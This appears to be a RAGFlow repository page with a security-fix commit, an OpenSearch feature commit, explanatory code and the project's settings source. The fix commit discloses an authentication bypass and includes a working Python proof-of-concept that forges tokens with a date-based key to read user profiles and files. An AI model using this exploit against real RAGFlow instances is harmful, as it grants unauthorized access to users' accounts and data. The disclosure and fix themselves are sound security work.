Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998)

### Description

There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system.

The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls.

### Source - Sink Analysis

**Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token

**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty access_token
5. **Sink:** Authentication succeeds, returning first user with empty access_token

### Proof of Concept

```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys

def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")

    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")

    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]

    auth_headers = {"Authorization": malicious_token}

    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)

        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f"  Email: {user_data.get('email')}")
                    print(f"  User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f"  Files found: {len(files)}")
            else:
                print("Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()

if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```

**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any credentials

**Version:** 0.19.0

@KevinHuSh @asiroliu @cike8899

Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 months ago
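A minimal, stdlib-only model of how the two flaws combine, for illustration only; it is not RAGFlow's code. A hypothetical HMAC-SHA256 `sign`/`unsign` pair stands in for itsdangerous' `URLSafeTimedSerializer` (which, despite the "JWT" wording in the message, produces itsdangerous signed tokens rather than standard JWTs), and a hypothetical in-memory `USERS` list stands in for `UserService.query()`. Because `str(date.today())` is simply the ISO date, an attacker derives the same key as the server, signs an empty payload, and the vulnerable lookup returns the first logged-out user. The fixed lookup assumes a guard of the shape the title describes: reject an empty or whitespace-only access token before querying.

```python
import hashlib
import hmac
from datetime import date
from typing import Optional

# Hypothetical user table: logging out leaves access_token as an empty string.
USERS = [
    {"email": "alice@example.com", "access_token": ""},  # logged out
    {"email": "bob@example.com", "access_token": "3f9c0d"},  # active session
]


def sign(secret_key: str, payload: str) -> str:
    """Append an HMAC-SHA256 tag to the payload (simplified stand-in for itsdangerous)."""
    tag = hmac.new(secret_key.encode(), payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def unsign(secret_key: str, token: str) -> Optional[str]:
    """Return the payload if the tag verifies under secret_key, else None."""
    payload, _, tag = token.rpartition(".")
    expected = hmac.new(secret_key.encode(), payload.encode(), hashlib.sha256).hexdigest()
    return payload if hmac.compare_digest(tag.encode(), expected.encode()) else None


def find_user(access_token: str) -> Optional[dict]:
    """Return the first user whose stored access_token equals the given value."""
    return next((u for u in USERS if u["access_token"] == access_token), None)


def load_user_vulnerable(secret_key: str, token: str) -> Optional[dict]:
    access_token = unsign(secret_key, token)
    if access_token is None:
        return None
    # Flaw 2: "" is a validly signed value and matches every logged-out user.
    return find_user(access_token)


def load_user_fixed(secret_key: str, token: str) -> Optional[dict]:
    access_token = unsign(secret_key, token)
    # Guard: refuse missing, empty, or whitespace-only tokens before any lookup.
    if not access_token or not access_token.strip():
        return None
    return find_user(access_token)


# Flaw 1: str(date) is the ISO date, so server and attacker derive the same key.
today = date.today()
server_key = str(today)
attacker_key = today.isoformat()
forged = sign(attacker_key, "")

print(load_user_vulnerable(server_key, forged))  # -> {'email': 'alice@example.com', 'access_token': ''}
print(load_user_fixed(server_key, forged))       # -> None
```

Either change blocks this particular forgery on its own: with a random key the attacker cannot produce a valid tag, and with the guard the empty payload never reaches the lookup. Applying both keeps a second line of defense if one is misconfigured.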
Feat: Adds OpenSearch2.19.1 as the vector_database support (#7140)

### What problem does this PR solve?

This PR adds support for OpenSearch 2.19.1 as a store engine and search engine option for RAGFlow.

### Main Benefit

1. OpenSearch 2.19.1 is licensed under the [Apache v2.0 License], which is more permissive than Elasticsearch's licensing.
2. For search, OpenSearch 2.19.1 supports full-text search, vector search, and hybrid search, with schemas similar to Elasticsearch's.
3. For storage, OpenSearch 2.19.1 stores text and vectors with schemas quite similar to Elasticsearch's.

### Changes

- Support an OpenSearch Python connector. This required many adaptations, since the schemas and API methods of ES and OpenSearch differ in many ways (knn_search in particular has a significant gap): rag/utils/opensearch_conn.py
- Support static config adaptations by changing: conf/service_conf.yaml, api/settings.py, rag/settings.py
- Support store and search schema differences between OpenSearch and ES: conf/os_mapping.json
- Support the OpenSearch Python SDK: pyproject.toml
- Support Docker config for OpenSearch 2.19.1: docker/.env, docker/docker-compose-base.yml, docker/service_conf.yaml.template

### How to use

- Elasticsearch remains the default doc/search engine. OpenSearch is used only if docker/.env sets `DOC_ENGINE=${DOC_ENGINE:-opensearch}`.

### Others

Our team tested many documents in our environment using OpenSearch as the vector database, and it works well. All of the OpenSearch configuration listed above is required.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Yongteng Lei <yongtengrey@outlook.com>
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
6 months ago
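The "How to use" note relies on default-value expansion: `${DOC_ENGINE:-opensearch}` (as in POSIX shells and Docker Compose interpolation) keeps an already-set, non-empty `DOC_ENGINE` and otherwise falls back to `opensearch`. `init_settings()` in api/settings.py then lower-cases the value and picks a connection class. The sketch below mirrors both steps under stated assumptions: the helper names `expand_default` and `select_doc_engine` are hypothetical, and dotted strings stand in for the real `ESConnection`, `InfinityConnection`, and `OSConnection` classes so it runs without RAGFlow installed.

```python
from typing import Mapping

# Engine names init_settings() accepts, mapped to the class it instantiates.
# Dotted strings stand in for the real classes so the sketch runs without RAGFlow.
DOC_ENGINES = {
    "elasticsearch": "rag.utils.es_conn.ESConnection",
    "infinity": "rag.utils.infinity_conn.InfinityConnection",
    "opensearch": "rag.utils.opensearch_conn.OSConnection",
}


def expand_default(env: Mapping[str, str], name: str, default: str) -> str:
    """Mimic ${name:-default}: fall back when the variable is unset or empty."""
    return env.get(name) or default


def select_doc_engine(engine: str) -> str:
    """Case-insensitive lookup; unknown names raise, as in init_settings()."""
    try:
        return DOC_ENGINES[engine.lower()]
    except KeyError:
        # init_settings() raises a plain Exception; ValueError is used here instead.
        raise ValueError(f"Not supported doc engine: {engine}") from None


print(select_doc_engine(expand_default({}, "DOC_ENGINE", "opensearch")))
# -> rag.utils.opensearch_conn.OSConnection
print(select_doc_engine(expand_default({"DOC_ENGINE": "Infinity"}, "DOC_ENGINE", "opensearch")))
# -> rag.utils.infinity_conn.InfinityConnection
```

One subtlety the sketch makes visible: `:-` treats an empty value as unset, whereas `os.environ.get("DOC_ENGINE", "elasticsearch")` in `init_settings()` falls back only when the variable is absent, so an exported but empty `DOC_ENGINE` would reach the dispatch as `""` and raise.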
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os
import secrets
from datetime import date
from enum import Enum, IntEnum

import rag.utils
import rag.utils.es_conn
import rag.utils.infinity_conn
import rag.utils.opensearch_conn
from api.constants import RAG_FLOW_SERVICE_NAME
from api.utils import decrypt_database_config, get_base_config
from api.utils.file_utils import get_project_base_directory
from rag.nlp import search

LIGHTEN = int(os.environ.get("LIGHTEN", "0"))

LLM = None
LLM_FACTORY = None
LLM_BASE_URL = None
CHAT_MDL = ""
EMBEDDING_MDL = ""
RERANK_MDL = ""
ASR_MDL = ""
IMAGE2TEXT_MDL = ""
API_KEY = None
PARSERS = None
HOST_IP = None
HOST_PORT = None
SECRET_KEY = None
FACTORY_LLM_INFOS = None

DATABASE_TYPE = os.getenv("DB_TYPE", "mysql")
DATABASE = decrypt_database_config(name=DATABASE_TYPE)

# authentication
AUTHENTICATION_CONF = None

# client
CLIENT_AUTHENTICATION = None
HTTP_APP_KEY = None
GITHUB_OAUTH = None
FEISHU_OAUTH = None
OAUTH_CONFIG = None
DOC_ENGINE = None
docStoreConn = None

retrievaler = None
kg_retrievaler = None

# user registration switch
REGISTER_ENABLED = 1

# sandbox-executor-manager
SANDBOX_ENABLED = 0
SANDBOX_HOST = None

STRONG_TEST_COUNT = int(os.environ.get("STRONG_TEST_COUNT", "32"))

BUILTIN_EMBEDDING_MODELS = ["BAAI/bge-large-zh-v1.5@BAAI", "maidalun1020/bce-embedding-base_v1@Youdao"]


def get_or_create_secret_key():
    secret_key = os.environ.get("RAGFLOW_SECRET_KEY")
    if secret_key and len(secret_key) >= 32:
        return secret_key

    # Check if there's a configured secret key
    configured_key = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("secret_key")
    if configured_key and configured_key != str(date.today()) and len(configured_key) >= 32:
        return configured_key

    # Generate a new secure key and warn about it
    import logging

    new_key = secrets.token_hex(32)
    logging.warning(
        "SECURITY WARNING: Using auto-generated SECRET_KEY. "
        f"Generated key: {new_key}"
    )
    return new_key


def init_settings():
    global LLM, LLM_FACTORY, LLM_BASE_URL, LIGHTEN, DATABASE_TYPE, DATABASE, FACTORY_LLM_INFOS, REGISTER_ENABLED
    LIGHTEN = int(os.environ.get("LIGHTEN", "0"))
    DATABASE_TYPE = os.getenv("DB_TYPE", "mysql")
    DATABASE = decrypt_database_config(name=DATABASE_TYPE)
    LLM = get_base_config("user_default_llm", {})
    LLM_DEFAULT_MODELS = LLM.get("default_models", {})
    LLM_FACTORY = LLM.get("factory")
    LLM_BASE_URL = LLM.get("base_url")
    try:
        REGISTER_ENABLED = int(os.environ.get("REGISTER_ENABLED", "1"))
    except Exception:
        pass

    try:
        with open(os.path.join(get_project_base_directory(), "conf", "llm_factories.json"), "r") as f:
            FACTORY_LLM_INFOS = json.load(f)["factory_llm_infos"]
    except Exception:
        FACTORY_LLM_INFOS = []

    global CHAT_MDL, EMBEDDING_MDL, RERANK_MDL, ASR_MDL, IMAGE2TEXT_MDL
    if not LIGHTEN:
        EMBEDDING_MDL = BUILTIN_EMBEDDING_MODELS[0]

    if LLM_DEFAULT_MODELS:
        CHAT_MDL = LLM_DEFAULT_MODELS.get("chat_model", CHAT_MDL)
        EMBEDDING_MDL = LLM_DEFAULT_MODELS.get("embedding_model", EMBEDDING_MDL)
        RERANK_MDL = LLM_DEFAULT_MODELS.get("rerank_model", RERANK_MDL)
        ASR_MDL = LLM_DEFAULT_MODELS.get("asr_model", ASR_MDL)
        IMAGE2TEXT_MDL = LLM_DEFAULT_MODELS.get("image2text_model", IMAGE2TEXT_MDL)

        # factory can be specified in the config name with "@". LLM_FACTORY will be used if not specified
        CHAT_MDL = CHAT_MDL + (f"@{LLM_FACTORY}" if "@" not in CHAT_MDL and CHAT_MDL != "" else "")
        EMBEDDING_MDL = EMBEDDING_MDL + (f"@{LLM_FACTORY}" if "@" not in EMBEDDING_MDL and EMBEDDING_MDL != "" else "")
        RERANK_MDL = RERANK_MDL + (f"@{LLM_FACTORY}" if "@" not in RERANK_MDL and RERANK_MDL != "" else "")
        ASR_MDL = ASR_MDL + (f"@{LLM_FACTORY}" if "@" not in ASR_MDL and ASR_MDL != "" else "")
        IMAGE2TEXT_MDL = IMAGE2TEXT_MDL + (f"@{LLM_FACTORY}" if "@" not in IMAGE2TEXT_MDL and IMAGE2TEXT_MDL != "" else "")

    global API_KEY, PARSERS, HOST_IP, HOST_PORT, SECRET_KEY
    API_KEY = LLM.get("api_key")
    PARSERS = LLM.get(
        "parsers", "naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One,audio:Audio,email:Email,tag:Tag"
    )

    HOST_IP = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("host", "127.0.0.1")
    HOST_PORT = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("http_port")

    SECRET_KEY = get_or_create_secret_key()

    global AUTHENTICATION_CONF, CLIENT_AUTHENTICATION, HTTP_APP_KEY, GITHUB_OAUTH, FEISHU_OAUTH, OAUTH_CONFIG
    # authentication
    AUTHENTICATION_CONF = get_base_config("authentication", {})

    # client
    CLIENT_AUTHENTICATION = AUTHENTICATION_CONF.get("client", {}).get("switch", False)
    HTTP_APP_KEY = AUTHENTICATION_CONF.get("client", {}).get("http_app_key")
    GITHUB_OAUTH = get_base_config("oauth", {}).get("github")
    FEISHU_OAUTH = get_base_config("oauth", {}).get("feishu")

    OAUTH_CONFIG = get_base_config("oauth", {})

    global DOC_ENGINE, docStoreConn, retrievaler, kg_retrievaler
    DOC_ENGINE = os.environ.get("DOC_ENGINE", "elasticsearch")
    # DOC_ENGINE = os.environ.get('DOC_ENGINE', "opensearch")
    lower_case_doc_engine = DOC_ENGINE.lower()
    if lower_case_doc_engine == "elasticsearch":
        docStoreConn = rag.utils.es_conn.ESConnection()
    elif lower_case_doc_engine == "infinity":
        docStoreConn = rag.utils.infinity_conn.InfinityConnection()
    elif lower_case_doc_engine == "opensearch":
        docStoreConn = rag.utils.opensearch_conn.OSConnection()
    else:
        raise Exception(f"Not supported doc engine: {DOC_ENGINE}")

    retrievaler = search.Dealer(docStoreConn)
    from graphrag import search as kg_search

    kg_retrievaler = kg_search.KGSearch(docStoreConn)

    if int(os.environ.get("SANDBOX_ENABLED", "0")):
        global SANDBOX_HOST
        SANDBOX_HOST = os.environ.get("SANDBOX_HOST", "sandbox-executor-manager")


class CustomEnum(Enum):
    @classmethod
    def valid(cls, value):
        try:
            cls(value)
            return True
        except BaseException:
            return False

    @classmethod
    def values(cls):
        return [member.value for member in cls.__members__.values()]

    @classmethod
    def names(cls):
        return [member.name for member in cls.__members__.values()]


class RetCode(IntEnum, CustomEnum):
    SUCCESS = 0
    NOT_EFFECTIVE = 10
    EXCEPTION_ERROR = 100
    ARGUMENT_ERROR = 101
    DATA_ERROR = 102
    OPERATING_ERROR = 103
    CONNECTION_ERROR = 105
    RUNNING = 106
    PERMISSION_ERROR = 108
    AUTHENTICATION_ERROR = 109
    UNAUTHORIZED = 401
    SERVER_ERROR = 500
    FORBIDDEN = 403
    NOT_FOUND = 404
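`get_or_create_secret_key()` resolves the signing key in three steps: a `RAGFLOW_SECRET_KEY` environment variable of at least 32 characters, then a configured `secret_key` that is at least 32 characters and is not today's date, then a fresh `secrets.token_hex(32)` value. The sketch below restates that precedence as a pure function so it can be checked without RAGFlow's config loader; the name `resolve_secret_key` and its `env`/`configured_key` parameters are hypothetical.

```python
import secrets
from datetime import date
from typing import Mapping, Optional

MIN_KEY_LENGTH = 32  # same threshold as get_or_create_secret_key()


def resolve_secret_key(env: Mapping[str, str], configured_key: Optional[str]) -> str:
    # 1. An explicit environment variable wins if it is long enough.
    env_key = env.get("RAGFLOW_SECRET_KEY")
    if env_key and len(env_key) >= MIN_KEY_LENGTH:
        return env_key
    # 2. A configured key is accepted unless it is too short or equals the old date default.
    if configured_key and configured_key != str(date.today()) and len(configured_key) >= MIN_KEY_LENGTH:
        return configured_key
    # 3. Otherwise generate 32 random bytes, hex-encoded to 64 characters.
    return secrets.token_hex(32)


strong = "x" * 40
print(resolve_secret_key({"RAGFLOW_SECRET_KEY": strong}, None) == strong)  # -> True
print(len(resolve_secret_key({}, str(date.today()))))  # -> 64
```

Because an ISO date is only 10 characters, the 32-character minimum alone would already reject a date-based key; the explicit date comparison mainly documents intent. A generated key exists only in memory, so tokens signed before a restart would presumably stop verifying afterward; setting `RAGFLOW_SECRET_KEY` keeps the key stable. The original function also writes the generated key into the warning log, which this sketch omits.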